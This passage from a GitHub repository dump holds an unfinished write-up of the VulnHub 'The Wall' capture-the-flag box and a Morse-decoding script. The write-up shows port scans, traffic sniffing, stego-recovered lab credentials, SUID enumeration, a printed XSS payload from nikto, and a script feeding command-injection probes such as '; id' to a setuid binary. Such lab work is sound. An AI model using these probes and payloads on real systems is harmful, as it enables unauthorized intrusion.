1.1](sickos-oscp-like.md)\n- [The Wall](the-wall.md) - wip\n" }, { "alpha_fraction": 0.5024979710578918, "alphanum_fraction": 0.5735509991645813, "avg_line_length": 59.40433883666992, "blob_id": "1adbc933e4a92042a2ea86cc97fb893056e66558", "content_id": "d036c6ff081447807daa826b73d1671d2d6ce0ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 30627, "license_type": "no_license", "max_line_length": 2403, "num_lines": 507, "path": "/the-wall.md", "repo_name": "jm33-m0/ctf-writeups", "src_encoding": "UTF-8", "text": "# The Wall CTF\n\n[The Wall CTF](https://www.vulnhub.com/entry/the-wall-1,130/) looked interesting so I started working on it after getting the [CSharp: VulnJSON](csharp-vulnjson.md) done. The description read as below:\n\n> In 1965, one of the most influential bands of our times was formed.. Pink Floyd. This boot2root box has been created to celebrate 50 years of Pink Floyd's contribution to the music industry, with each challenge giving the attacker an introduction to each member of the Floyd.\n\n> You challenge is simple... 
set your controls for the heart of the sun, get root, and grab the flag! Rock on!\n\nI've heard many of the Pink Floyd songs, but I don't know much of the trivia around Pink Floyd, which could of course help in the course of working on this CTF challenge.\n\nSo, here I started with identifying the host IP using `ARP-SCAN(1)`. I know that the `ARP-SCAN(1)` result usually shows `CADMUS COMPUTER SYSTEMS` for my VMs, and hence I know which one is mine (I do have the MAC address too).\n\nThe next step is `NMAP(1)`, which looked like below:\n\n```shell\n$ nmap -T5 -A 192.168.168.200\n\nStarting Nmap 6.47 ( http://nmap.org ) at 2016-02-25 14:09 CST\nNmap scan report for 192.168.168.200\nHost is up (0.00025s latency).\nNot shown: 999 filtered ports\nPORT STATE SERVICE VERSION\n80/tcp open http OpenBSD httpd\n|_http-methods: No Allow or Public header in OPTIONS response (status code 405)\n|_http-title: Site doesn't have a title (text/html).\nMAC Address: 08:00:27:AE:CB:01 (Cadmus Computer Systems)\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning: OpenBSD 5.X\nOS CPE: cpe:/o:openbsd:openbsd:5\nOS details: OpenBSD 5.0 - 5.4\nNetwork Distance: 1 hop\n\nTRACEROUTE\nHOP RTT ADDRESS\n1 0.25 ms 192.168.168.200\n\nOS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 130.68 seconds\n```\n\nAs you see from the log above, we don't have any open, unfiltered port on the host to work with, which means there's no way we can connect to the host. From past experience, in cases like this it's often good to analyze the network traffic, because boxes with no open services often try to connect to services outside. While we cannot connect to any port on the host, it's quite possible the host is trying to connect to something on the internal network or the internet. This is where tools like wireshark, tshark and tcpdump can be helpful. In our case, we will use `TCPDUMP(8)`. You should definitely check the man page for `TCPDUMP(8)`, as it's a really fantastic tool for viewing network traffic. For this CTF, we will stick to the simple, basic `tcpdump` use case: all we do is specify a pcap filter as the expression to filter the traffic. You should definitely check out the man page for pcap filters: `man 7 pcap-filter`. 
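\n\nIf you prefer staying in Python for this step, scapy (assuming it is installed) can apply the very same pcap filter expressions. A minimal sketch, which needs root:\n\n```python\nfrom scapy.all import sniff\n\n# print a one-line summary of the first ten packets coming from the target\nsniff(filter=\"src host 192.168.168.200\", prn=lambda pkt: print(pkt.summary()), count=10)\n```\n\n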
Initially I am interested in all the traffics originating from the host.\n\n```shell\n$ tcpdump src host 192.168.168.200\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\nlistening on eno1, link-type EN10MB (Ethernet), capture size 262144 bytes\n15:05:24.871468 IP 192.168.168.200.16728 > 192.168.168.1.1337: Flags [S], seq 3007729370, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 3462444769 ecr 0], length 0\n15:05:24.874296 ARP, Request who-has 192.168.168.3 tell 192.168.168.200, length 28\n15:05:24.874301 ARP, Request who-has 192.168.168.3 tell 192.168.168.200, length 28\n15:05:24.875913 IP 192.168.168.200.39709 > 192.168.168.4.1337: Flags [S], seq 2659870036, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 1877083112 ecr 0], length 0\n15:05:24.878635 IP 192.168.168.200.17830 > 192.168.168.6.1337: Flags [S], seq 361318733, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 2545993469 ecr 0], length 0\n--- redacted ---\n```\n\nBased on the tcpdump output, I saw that the host is aggressively trying to find the services running on port 1337 but I don't know yet what sort of service it is trying to connect to. A good first step is to use the simple netcat listener and see how the traffic looks like.\n\n```shell\n$ nc -l 1337\n\n .u!\"`\n .x*\"`\n ..+\"NP\n .z\"\" ?\n M#` 9 , ,\n 9 M d! ,8P'\n R X.:x' R' ,\n F F' M R.d'\n d P @ E` ,\n ss P ' P N.d'\n x '' '\n X x .\n 9 .f ! . $b\n 4; $k / dH $f\n 'X ;$$ z . MR :$\n R M$$, : d9b M' tM\n M: #'$L ;' M `8 X MR\n `$;t' $F # X ,oR t Q;\n $$@ R$ H :RP' $b X @'\n 9$E @Bd' $' ?X ; W\n `M' `$M d$ `E ;.o* :R ..\n ` ' \"' ' @' '$o*\"' \n\n The Wall by @xerubus\n -= Welcome to the Machine =-\n\nIf you should go skating on the thin ice of modern life, dragging behind you the silent reproach of a million tear-stained eyes, don't be surprised when a crack in the ice appears under your feet. - Pink Floyd, The Thin Ice\n```\n\nSince I had host system connect to my system and I got no shell, it seemed like it would trigger some sort of action on the host itself. Not having shell means we're back to where we were. More close review of the tcpdump log didn't help much.\n\nSounds like we have a reverse port knocking in place and now port 80 is open on the server after I got the host connected to port 1337 of my system.\n\n```shell\nnmap -T5 -A 192.168.168.200\n\nStarting Nmap 6.47 ( http://nmap.org ) at 2016-02-26 13:28 CST\nNmap scan report for 192.168.168.200\nHost is up (0.00023s latency).\nNot shown: 999 filtered ports\nPORT STATE SERVICE VERSION\n80/tcp open http OpenBSD httpd\n|_http-methods: No Allow or Public header in OPTIONS response (status code 405)\n|_http-title: Site doesn't have a title (text/html).\nMAC Address: 08:00:27:AE:CB:01 (Cadmus Computer Systems)\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning: OpenBSD 5.X\nOS CPE: cpe:/o:openbsd:openbsd:5\nOS details: OpenBSD 5.0 - 5.4\nNetwork Distance: 1 hop\n\nTRACEROUTE\nHOP RTT ADDRESS\n1 0.23 ms 192.168.168.200\n\nOS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 130.18 seconds\n```\n\nCool, we've port 80 accessible to us. No `robots.txt` this time but on a run of `nikto`, we see that it is running [PostNuke CMS](http://www.postnuke.com/module-Content-view-pid-6.html). 
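\n\nAs a side note on the listener step above: if netcat were not at hand, a few lines of Python 3 give the same `nc -l 1337` behaviour. A minimal sketch:\n\n```python\nimport socket\n\nwith socket.socket() as srv:\n    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n    srv.bind((\"0.0.0.0\", 1337))\n    srv.listen(1)\n    conn, addr = srv.accept()  # wait for the box to connect back\n    print(\"connection from\", addr)\n    print(conn.recv(65535).decode(errors=\"replace\"))  # dump whatever it sends\n```\n\n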
Upon a google search, I see that PostNuke's development has been stopped and that it's notorious for too many bugs.\n\n```shell\nnikto -h 192.168.168.200\n- Nikto v2.1.5\n---------------------------------------------------------------------------\n+ Target IP: 192.168.168.200\n+ Target Hostname: 192.168.168.200\n+ Target Port: 80\n+ Start Time: 2016-02-26 13:28:40 (GMT-6)\n---------------------------------------------------------------------------\n+ Server: OpenBSD httpd\n+ The anti-clickjacking X-Frame-Options header is not present.\n+ Retrieved x-powered-by header: PHP/5.6.11\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ /postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft Utilities\\\"%3<script>alert('Vulnerable')</script>: Postnuke Phoenix 0.7.2.3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.\n+ 6544 items checked: 3 error(s) and 3 item(s) reported on remote host\n+ End Time: 2016-02-26 13:28:53 (GMT-6) (13 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested\n```\n\nTrying to access anything on `http://192.168.168.200/postnuke/<anyfile_that_exists>.php` gives me a 403 Forbidden with the text `Access denied.`. Upon checking the source code of the root page, I see the following comment:\n```shell\n<!--If you want to find out what's behind these cold eyes, you'll just have to claw your way through this disguise. - Pink Floyd, The Wall\n\nDid you know? The Publius Enigma is a mystery surrounding the Division Bell album. Publius promised an unspecified reward for solving the\nriddle, and further claimed that there was an enigma hidden within the artwork.\n\n737465673d3333313135373330646262623337306663626539373230666536333265633035-->\n```\n\nThe `hex_to_ascii()` process gives the string `steg=33115730dbbb370fcbe9720fe632ec05`, and cracking the md5 reveals the value of `33115730dbbb370fcbe9720fe632ec05` to be `divisionbell`. The image on the root page, the comment, and the possible username `steg` all suggest steganography to me. I was not having any success on the `/postnuke` path either. 
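\n\nFor reference, the `hex_to_ascii()` step is a one-liner in Python 3:\n\n```python\nblob = \"737465673d3333313135373330646262623337306663626539373230666536333265633035\"\nprint(bytes.fromhex(blob).decode())  # -> steg=33115730dbbb370fcbe9720fe632ec05\n```\n\n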
I ran a exif analysis using `exif`, `exifprobe` and `exiftags` and the following was what I got with `exifprobe`.\n\n```shell\n$ exifprobe pink_floyd.jpg\nFile Name = pink_floyd.jpg\nFile Type = JPEG\nFile Size = 114362\n@000000000=0 : <JPEG_SOI>\n@0x0000002=2 : <JPEG_APP0> 0xffe0 length 16, 'JFIF'\n@0x000000b=11 : Version = 1.2\n@0x000000d=13 : Units = 'aspect ratio'\n@0x000000e=14 : Xdensity = 100\n@0x0000010=16 : Ydensity = 100\n@0x0000012=18 : XThumbnail = 0\n@0x0000013=19 : YThumbnail = 0\n@0x0000013=19 : </JPEG_APP0>\n@0x0000014=20 : <JPEG_DQT> length 67\n@0x0000059=89 : <JPEG_DQT> length 67\n@0x000009e=158 : <JPEG_SOF_0> length 17, 8 bits/sample, components=3, width=750, height=717\n@0x00000b1=177 : <JPEG_DHT> length 31 table class = 0 table id = 0\n@0x00000d2=210 : <JPEG_DHT> length 181 table class = 0 table id = 1\n@0x0000189=393 : <JPEG_DHT> length 31 table class = 1 table id = 0\n@0x00001aa=426 : <JPEG_DHT> length 181 table class = 1 table id = 1\n@0x0000261=609 : <JPEG_SOS> length 12 start of JPEG data, 3 components 537750 pixels\n@0x001beb8=114360 : <JPEG_EOI> JPEG length 114362\n-0x001beb9=114361 : END OF FILE\n@000000000=0 : Start of JPEG baseline DCT compressed primary image [750x717] length 114362 (APP0)\n-0x001beb9=114361 : End of JPEG primary image data\nNumber of images = 1\nFile Format = JPEG/APP0/JFIF\n```\n\nI ran the `strings` command and saw some odds at the top.\n```shell\n$ strings pink_floyd.jpg | head -n5\nJFIF\n$3br\n%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz\n\t#3R\n&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz\n```\n\nI tried the same command on the couple of other image files and didn't see such pattern in any of those files but still it could be false positive. Still I kept this in my mind and started exploring more. I searched for [steganography tools](https://en.wikipedia.org/wiki/Steganography_tools) and started downloading and running them. I had a success with steghide.\n\n```shell\n$ steghide extract -sf pink_floyd.jpg\nEnter passphrase:\nwrote extracted data to \"pink_floyd_syd.txt\".\n\n$ cat pink_floyd_syd.txt\nHey Syd,\n\nI hear you're full of dust and guitars?\n\nIf you want to See Emily Play, just use this key: U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0\n\nRoger\n\nDid you know? In 1965, The Pink Floyd Sound changed their name to Pink Floyd. The name was inspired\nby Pink Anderson and Floyd Council, two blues muscians on the Piedmont Blues record Syd Barret had in\nhis collection.\n```\n\nWe've a new information and the immediately important bit one is `U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0`\n\n```shell\n$ base64 -d <<< U3lkQmFycmV0dA==\nSydBarrett\n```\n\nAnd, the md5 hash was found to be hash of `pinkfloydrocks`. Cool, this looked like its going good so far. I knew that I could not go any far with `/postnuke/modules.php` because I could not figure out how to bypass this 403. Thinking for a while, the `1965` made a strike in my mind so I tried listening on this port immediately.\n\n```shell\n$ nc -l 1965\n```\n\nI waited for couple of minutes and it didn't connect back like it did previously. Then, I tried to telnet.\n\n*Note: My target IP is 192.168.168.39 now. I had to re-import appliance due to vhdd failure*\n\n```shell\n$ telnet 192.168.168.39 1965\nTrying 192.168.168.39...\nConnected to 192.168.168.200.\nEscape character is '^]'.\nSSH-2.0-OpenSSH_7.0\n```\n\nHoly cow! 
The ssh listener and I had some information gathered earlier which could be credentials to this.\n\n```shell\n$ ssh [email protected] -p 1965\[email protected]'s password:\nCould not chdir to home directory /home/SydBarrett: No such file or directory\nThis service allows sftp connections only.\nConnection to 192.168.168.39 closed.\n```\n\nSo, we know that we need to use sftp client instead.\n```shell\n$ sftp -P 1965 [email protected]\[email protected]'s password:\nConnected to 192.168.168.39.\nsftp> ls -a1\n.\n..\n.mail\nbio.txt\nsyd_barrett_profile_pic.jpg \nsftp> cat bio.txt\nInvalid command.\nsftp> get bio.txt /tmp\nFetching /bio.txt to /tmp/bio.txt\n/bio.txt 100% 1912 1.9KB/s 00:00 \nsftp> get syd_barrett_profile_pic.jpg /tmp\nFetching /syd_barrett_profile_pic.jpg to /tmp/syd_barrett_profile_pic.jpg\n/syd_barrett_profile_pic.jpg\nsftp> ls -a1 .mail\n.mail/.\n.mail/..\n.mail/.stash\n.mail/sent-items\nsftp> get .mail/.stash /tmp/stash\nFetching /.mail/.stash/ to /tmp/stash\nCannot download non-regular file: /.mail/.stash/\nsftp> get .mail/sent-items /tmp/\nFetching /.mail/sent-items to /tmp/sent-items\n/.mail/sent-items\nsftp> ls -a1 .mail/.stash\n.mail/.stash/.\n.mail/.stash/..\n.mail/.stash/eclipsed_by_the_moon\nsftp> get .mail/.stash/eclipsed_by_the_moon /tmp\nFetching /.mail/.stash/eclipsed_by_the_moon to /tmp/eclipsed_by_the_moon\n/.mail/.stash/eclipsed_by_the_moon 100% 47MB 15.5MB/s 00:03\n\n$ cat /tmp/bio.txt\n\"Roger Keith \"Syd\" Barrett (6 January 1946 – 7 July 2006) was an English musician, composer, singer, songwriter, and painter. Best known as a founder member of the band Pink Floyd, Barrett was the lead singer, guitarist and principal songwriter in its early years and is credited with naming the band. Barrett was excluded from Pink Floyd in April 1968 after David Gilmour took over as their new frontman, and was briefly hospitalized amid speculation of mental illness.\n\nBarrett was musically active for less than ten years. With Pink Floyd, he recorded four singles, their debut album (and contributed to the second one), and several unreleased songs. Barrett began his solo career in 1969 with the single \"Octopus\" from his first solo album, The Madcap Laughs (1970). The album was recorded over the course of a year with five different producers (Peter Jenner, Malcolm Jones, David Gilmour, Roger Waters and Barrett himself). Nearly two months after Madcap was released, Barrett began working on his second and final album, Barrett (1970), produced by Gilmour and featuring contributions from Richard Wright. He went into self-imposed seclusion until his death in 2006. In 1988, an album of unreleased tracks and outtakes, Opel, was released by EMI with Barrett's approval.\n\nBarrett's innovative guitar work and exploration of experimental techniques such as dissonance, distortion and feedback influenced many musicians, including David Bowie and Brian Eno. His recordings are also noted for their strongly English-accented vocal delivery. After leaving music, Barrett continued with painting and dedicated himself to gardening. Biographies began appearing in the 1980s. 
Pink Floyd wrote and recorded several tributes to him, most notably the 1975 album Wish You Were Here, which included \"Shine On You Crazy Diamond\", as homage to Barrett.\"\n\nSource: Wikipedia (https://en.wikipedia.org/wiki/Syd_Barrett)\n\n$ cat /tmp/sent-items\nDate: Sun, 24 Oct 1965 18:45:21 +0200\nFrom: Syd Barrett <[email protected]>\nReply-To: Syd Barret <[email protected]>\nTo: Roger Waters <[email protected]>\nSubject: Had to hide the stash\n\nRoger... I had to hide the stash.\n\nUsual deal.. just use the scalpel when you find it.\n\nOk, sorry for that.\n\nRock on man\n\n\"Syd\"\n\n$ file /tmp/eclipsed_by_the_moon\n/tmp/eclipsed_by_the_moon: gzip compressed data, last modified: Tue Nov 10 18:15:47 2015, from Unix\n```\n\nNow, I had a picture, a bio, an e-mail sent to Roger Waters regarding the hidden stash and hopefully the stash that Syd was referring to. I ran exif related tools and strings but nothing helpful. I ran out of pointers on what could be the passphrase for steghide. The `eclipsed_by_the_moon` was a gzip compressed file so I extracted it and went ahead.\n\n```shell\n$ tar xvfz eclipsed_by_the_moon\neclipsed_by_the_moon.lsd\n```\n\nWe have another file with extension `.lsd`.\n```shell\n$ file eclipsed_by_the_moon.lsd\neclipsed_by_the_moon.lsd: DOS/MBR boot sector, code offset 0x3c+2, OEM-ID \"MSDOS5.0\", sectors/cluster 2, reserved sectors 8, root entries 512, Media descriptor 0xf8, sectors/FAT 188, sectors/track 63, heads 255, hidden sectors 2048, sectors 96256 (volumes > 32 MB) , serial number 0x9e322180, unlabeled, FAT (16 bit)\n```\n\nHey, that's a DOS/MBR boot sector? I remember one of the previous notes referring to `scalpel` which is a known tool for recovering deleted files from the filesystems. So I was pretty sure that I had to use the disk recovery tools. I had `testdisk` installed on my system already and thought of using it. Upon running testdisk (`testdisk /tmp/eclipsed_by_the_moon.lsd`), I was able to find an image named `rogerwaters.jpg`.\n\nWe got the image of rogerwaters with a dialog box.\n\n![Roger Waters](images/rogerwaters.jpg \"Roger Waters\")\n\nI initially thought this (`hello_is_there_anybody_in_there`) might be the passphrase for one of the last two images. Turned out it was not. Maybe I should try ssh/sftp again.\n\n```shell\nssh -p 1965 [email protected]\[email protected]'s password:\nOpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015\n\n .u!\"`\n .x*\"`\n ..+\"NP\n .z\"\" ?\n M#` 9 , ,\n 9 M d! ,8P'\n R X.:x' R' ,\n F F' M R.d'\n d P @ E` ,\n ss P ' P N.d'\n x '' '\n X x .\n 9 .f ! . $b\n 4; $k / dH $f\n 'X ;$$ z . MR :$\n R M$$, : d9b M' tM\n M: #'$L ;' M `8 X MR\n `$;t' $F # X ,oR t Q;\n $$@ R$ H :RP' $b X @'\n 9$E @Bd' $' ?X ; W\n `M' `$M d$ `E ;.o* :R ..\n ` ' \"' ' @' '$o*\"' \n$\n```\n\nThis time, it gave me the ssh access. 
So, I started further investigation from there.\n\n```shell\n$ ls -liah\ntotal 176\n16384 drwx------ 3 RogerWaters RogerWaters 512B Oct 28 09:29 .\n 2 drwxr-xr-x 7 root wheel 512B Oct 24 17:36 ..\n16387 -rw-r--r-- 1 RogerWaters RogerWaters 87B Oct 24 17:35 .Xdefaults\n16388 -rw-r--r-- 1 RogerWaters RogerWaters 773B Oct 24 17:35 .cshrc\n16389 -rw-r--r-- 1 RogerWaters RogerWaters 103B Oct 24 17:35 .cvsrc\n16390 -rw-r--r-- 1 RogerWaters RogerWaters 398B Oct 26 04:01 .login\n16391 -rw-r--r-- 1 RogerWaters RogerWaters 175B Oct 24 17:35 .mailrc\n16392 -rw-r--r-- 1 RogerWaters RogerWaters 218B Oct 24 17:35 .profile\n16385 drwx------ 2 RogerWaters RogerWaters 512B Oct 26 03:56 .ssh\n16394 -rw-r--r-- 1 RogerWaters RogerWaters 2.8K Oct 26 08:57 bio.txt\n16393 -rw-r--r-- 1 RogerWaters RogerWaters 0B Oct 28 05:02 mbox\n16395 -rw-r--r-- 1 RogerWaters RogerWaters 47.0K Oct 26 06:16 roger_waters_profile_pic.jpg\n16396 -rw-r--r-- 1 RogerWaters RogerWaters 16.2K Oct 26 06:23 secret-diary\n```\n\nI decided to copy the files over quickly using scp.\n\n```shell\n$ mkdir /tmp/rogers\n$ scp -P 1965 -r [email protected]:~ /tmp/rogers/\[email protected]'s password:\nauthorized_keys 100% 0 0.0KB/s 00:00 \n.Xdefaults 100% 87 0.1KB/s 00:00 \n.cshrc 100% 773 0.8KB/s 00:00 \n.cvsrc 100% 103 0.1KB/s 00:00 \n.login 100% 398 0.4KB/s 00:00 \n.mailrc 100% 175 0.2KB/s 00:00 \n.profile 100% 218 0.2KB/s 00:00 \nmbox 100% 0 0.0KB/s 00:00 \nbio.txt 100% 2853 2.8KB/s 00:00 \nroger_waters_profile_pic.jpg 100% 47KB 47.1KB/s 00:00 \nsecret-diary 100% 16KB 16.2KB/s 00:00 \n```\n\nLooking at the files, there were no obvious pointers to go on, and the exif and steg analysis of the profile picture didn't produce anything either.\n\nSo, I got back to the ssh session and started performing the basic enumeration to find files that could be of interest for exploiting the system. I explored the file system and looked for possible backdoors, daemons or vulnerable services. (`-perm -6000` below matches files with both the setuid and setgid bits set, i.e. binaries that run with elevated privileges.)\n\n```shell\n$ uname -a\nOpenBSD thewall.localdomain 5.8 GENERIC#1066 i386\n$ find / -perm -6000 -type f -exec ls -liah {} + 2> /dev/null\n52079 -r-sr-sr-x 1 root daemon 29.8K Aug 16 2015 /usr/bin/lpr\n52080 -r-sr-sr-x 1 root daemon 25.8K Aug 16 2015 /usr/bin/lprm\n 3280 -rws--s--x 1 NickMason NickMason 7.1K Aug 8 2015 /usr/local/bin/brick\n 3281 -rwsr-s--- 1 DavidGilmour RichardWright 7.3K Oct 25 07:58 /usr/local/bin/shineon\n26048 -r-sr-sr-x 2 root authpf 21.8K Aug 16 2015 /usr/sbin/authpf\n26048 -r-sr-sr-x 2 root authpf 21.8K Aug 16 2015 /usr/sbin/authpf-noip\n```\n\nAmong the output above, the most interesting entries are `/usr/local/bin/brick` and `/usr/local/bin/shineon`. While `/usr/local/bin/shineon` seems to have tighter permissions (we're logged in as RogerWaters), `/usr/local/bin/brick` has the executable bit set for all users. Great! Maybe not. I could not read the content of the file as-is or run `strings` over it.\n\n```shell\n$ /usr/local/bin/brick\n\n\n\n\nWhat have we here, laddie?\nMysterious scribbings?\nA secret code?\nOh, poems, no less!\nPoems everybody!\n\n\n\n\nWho is the only band member to be featured on every Pink Floyd album? : Nick Mason\n```\n\nI gave the name as `Nick Mason` after a quick google search for confirmation, and it got me logged in as `NickMason`. I later figured out that I had to input `Nick Mason` with the space in between, although I would still get the error `/bin/sh: Cannot determine current working directory`. But hey, we've got something that takes input. Maybe it's the injection point? A quick way to probe that idea is sketched below. 
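\n\nOne quick way to probe that idea is to pipe a handful of candidate payloads at the prompt and compare the responses. A minimal, untested Python 3 sketch (the payloads are just illustrative guesses):\n\n```python\nimport subprocess\n\npayloads = [\"Nick Mason\", \"Nick Mason; id\", \"Nick Mason && id\", \"`id`\"]\nfor p in payloads:\n    # brick reads the answer from stdin; a hung run will raise TimeoutExpired\n    result = subprocess.run([\"/usr/local/bin/brick\"], input=p + \"\\n\",\n                            capture_output=True, text=True, timeout=10)\n    print(repr(p), \"->\", result.stdout.strip()[-120:])\n```\n\n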
Also, with some quick playing, I figured out it would not take more than 1024 characters as input.\n\n```shell\n$ whoami\nNickMason\n$ groups NickMason\nNickMason\n$ cd /home/NickMason/\n$ ls -liah\ntotal 1576\n24576 drwx------ 3 NickMason NickMason 512B Aug 8 2015 .\n 2 drwxr-xr-x 7 root wheel 512B Oct 24 17:36 ..\n24579 -rw-r--r-- 1 NickMason NickMason 87B Oct 24 17:34 .Xdefaults\n24580 -rw-r--r-- 1 NickMason NickMason 773B Oct 24 17:34 .cshrc\n24581 -rw-r--r-- 1 NickMason NickMason 103B Oct 24 17:34 .cvsrc\n24582 -rw-r--r-- 1 NickMason NickMason 398B Oct 24 17:34 .login\n24583 -rw-r--r-- 1 NickMason NickMason 175B Oct 24 17:34 .mailrc\n24584 -rw-r--r-- 1 NickMason NickMason 218B Oct 24 17:34 .profile\n24577 drwx------ 2 NickMason NickMason 512B Oct 28 04:48 .ssh\n24595 -rw-r--r-- 1 NickMason NickMason 1.3K Oct 26 08:58 bio.txt\n24602 -rw-r--r-- 1 NickMason NickMason 0B Oct 28 05:02 mbox\n24594 -rw-r--r-- 1 NickMason NickMason 749K Aug 8 2015 nick_mason_profile_pic.jpg\n$ cp nick_mason_profile_pic.jpg /tmp/\n$ chmod a+rw /tmp/nick_mason_profile_pic.jpg\n```\n\nWell, I could have just scp'd it from the box to my system, but either way I wanted the file locally: at 749K it seemed suspiciously large for a profile picture unless it was a much higher quality image. Anyway, once I copied the file to my system, I could not open it with the image viewer.\n\n```shell\n$ file nick_mason_profile_pic.jpg\nnick_mason_profile_pic.jpg: Ogg data, Vorbis audio, stereo, 44100 Hz, ~160000 bps, created by: Xiph.Org libVorbis I\n```\n\nIt revealed that it's an Ogg file... Ahh, trying to deceive meh? :D I renamed it and listened to the music. In the back of my mind I also suspected this could be steganography again. I immediately remembered the `cat somefile.ogg sometext_to_hide.txt > my-awesome-music.ogg` trick and tried to unzip the file. Well, it didn't work. Honestly, this is the point where I got stuck for a really long time. I read a lot on how data can be encoded and stored in audio files and read up on various audio formats. I was running out of ideas, so this is where I had to take a hint. I checked one of the walkthroughs quickly to see whether my route was correct, and I saw that I had to get Morse code out of the audio.\n\nRather than following the usual route now, I thought of playing with `sox`. I did come across an [experimental morse decoder](http://morsecode.scphillips.com/labs/decoder/) written purely in javascript, but didn't pursue it.\n\n```shell\n$ sudo apt-get install -y sox\n$ sox nick_mason_profile_pic.ogg output.dat\n$ head -n10 output.dat\n; Sample Rate 44100\n; Channels 2\n 0 0 0\n 2.2675737e-05 0 0\n 4.5351474e-05 0 0\n 6.8027211e-05 0 0\n 9.0702948e-05 0 0\n 0.00011337868 0 0\n 0.00013605442 0 0\n 0.00015873016 0 0\n```\n\nI found some online post which had some information and had also done the work of creating morse code from such a dump. 
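\n\n(For reference: each data row in the `.dat` dump is just `elapsed-time left-sample right-sample`, with sample values normalised to the -1..1 range, so tone detection boils down to thresholding the absolute amplitude and measuring run lengths, which is exactly what the script used below does.)\n\n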
I used the same [python script](codes/morse-code.py).\n\n```shell\n$ python morse-code.py\n .....--...-............-..-..........-....-.--.......-........................-.................................................................................................................................................................--..-.--....-.-..-.....-.............-...---.-.--..--.----.........------....-.....---..........-........................................-..-....................................--.-...-......---.....-......---.-----.....-...-....-...-......---.---.-.-...---.........-..-.-............-...--.---.-.-.-.....-.....-.-......-.......--.---.-.-....-.-..-----.--.--..-----....-.--.-.-....-..----------.-...-.------.-.--.-------..-.----...-..---.-----.....-.--...........-........-.-..-....-.-...-..-.-.----............................-----.----.-.-..--..-..-....--..........-.....--..-.........-...------...--.-.-.....--.------..-------..-..--.-.....-.-...................-..-...---...-.-----.-.---.-.----..-..------.---.------------.---..-..--.-------....--.----------.--..----.--.-------.----.-.-..--.---.---...----.-..-...--.---.-..-.---.--.--.-----..---.-.--.-------......-.-..-..---.--......-..--.-..-.-....-------...-----....-...---...--..............-.......................................-.........-----.-.---.-.-....-.-.......---------...--.-.-....-..---.--...---.--......-.-...-.............-.-...-..--..-.----.................-.-............-...---.--..--....-..--.--.----.-.----..--.-.-....-----.-.--.--.------.------.----.-.-..---.-.--...--.......--.-..-.-.............-..-.-.-....--.-.---.....-...--.--...------.....---..---..........--..-.......-.....-.-.-.-.-.-.-.---.-.-.----................-............................................................................................................................................................................................................................................................................................................................................................................................................................................................-..................-..................-.....................................................................................................................................................................-........................................................................................ ..... ..... ..... . .\n```\n\nThis looked good but it seemed I had to extract noise separately and run the sox and script over it (or the other way around?). 
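\n\nOnce a clean dot/dash stream with sane letter spacing comes out, the final step is just a table lookup. A minimal sketch with an abridged (assumed) table:\n\n```python\nMORSE = {\".-\": \"a\", \"-...\": \"b\", \"-.-.\": \"c\", \"...\": \"s\", \"---\": \"o\"}  # abridged table\n\ndef decode(stream):\n    # letters are separated by single spaces in the aggregated output\n    return \"\".join(MORSE.get(letter, \"?\") for letter in stream.split())\n\nprint(decode(\"... --- ...\"))  # -> sos\n```\n\n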
I still need to play with it.\n\n#WIP\n" }, { "alpha_fraction": 0.5434530973434448, "alphanum_fraction": 0.5828505158424377, "avg_line_length": 18.177778244018555, "blob_id": "769405f2b30368110932aa7203b647077241fa86", "content_id": "b11bcfeaa078937127707fabd32a3e9f45ef8d5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 863, "license_type": "no_license", "max_line_length": 73, "num_lines": 45, "path": "/codes/morse-code.py", "repo_name": "jm33-m0/ctf-writeups", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# Parse and aggregate file created by sox via the command:\n# sox inputfile.ext output.dat\n\nfp = open(\"output.dat\")\ndata = [int(abs(float(x.split()[1])) > 0.01) for x in fp.readlines()[2:]]\nfp.close()\n\n# count all the runs\ncounts = []\ncurrent = -1\ncount = 0\nfor i in data:\n if i != current:\n counts.append((current,count))\n current = i\n count = 0\n count += 1\n\n# now remove all short runs, which also removes the -1 row!\ncounts = [x for x in counts if x[1] >= 15]\n\n# and reaggregate everything\ncounts2 = []\ncurrent = -1\ncount = 0\nfor i in counts:\n if i[0] != current:\n counts2.append((current,count))\n current = i[0]\n count = 0\n count += i[1]\n\nmystr = \"\"\nfor x in counts2:\n if x[0] == 0:\n if x[1] > 350:\n mystr += \" \"\n elif x[0] == 1:\n if x[1] > 500:\n mystr += \"-\"\n else:\n mystr += \".\"\nprint mystr\n" } ]
6
cammac60/Python-notes
https://github.com/cammac60/Python-notes
b8206b2c0ed667dee7c2f4ce40eee62018ddb794
7b28e9c6510e421979ad8144c6ff748dcdd37370
afa2b0e01ed0ecda41b3bcb55ec05252a99fbfe8
refs/heads/master
2022-11-18T06:08:51.836760
2020-07-14T17:02:57
2020-07-14T17:02:57
279,402,627
0
0
null
null
null
null
null
